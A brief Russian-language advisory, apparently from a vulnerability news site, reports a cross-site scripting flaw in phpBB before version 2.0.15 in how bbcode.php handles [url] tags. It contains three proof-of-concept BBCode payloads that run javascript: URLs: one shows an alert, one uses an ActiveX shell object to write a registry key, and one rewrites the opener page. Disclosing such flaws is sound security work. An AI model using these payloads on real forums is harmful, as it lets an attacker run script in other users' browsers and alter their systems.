Программа: phpBB версии до 2.0.15 

Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей.
Уязвимость обнаружена при обработке BBCODE URL в сценарии bbcode.php. Удаленный пользователь может с помощью специально сформированного сообщения выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. 

Примеры:

[url=javascript://%0ASh=alert(%22CouCou%22); window.close();]Alert box with
"CouCou"[/url] 

[url=javascript://%0ASh=new%20ActiveXObject (%22WScript.shell%22);Sh.regwrite(%22HKCU
%5C%5CQQQQQ%5C%5Cqq%22,%22Cou Cou%22);window.close();] Createregistryentry:HKCU\QQQQQ\qq= 
"CouCou"[/url]

[url=javascript://%0Awindow.opener.document. body.innerHTML=window.opener.document.body.
innerHTML.replace(%27Hi%20Paul%27,%27 Hi%20P.A.U.L%27);window.close();]Modifyopenerpage:Paul->
P.A.U.L[/url]



Оставить мнение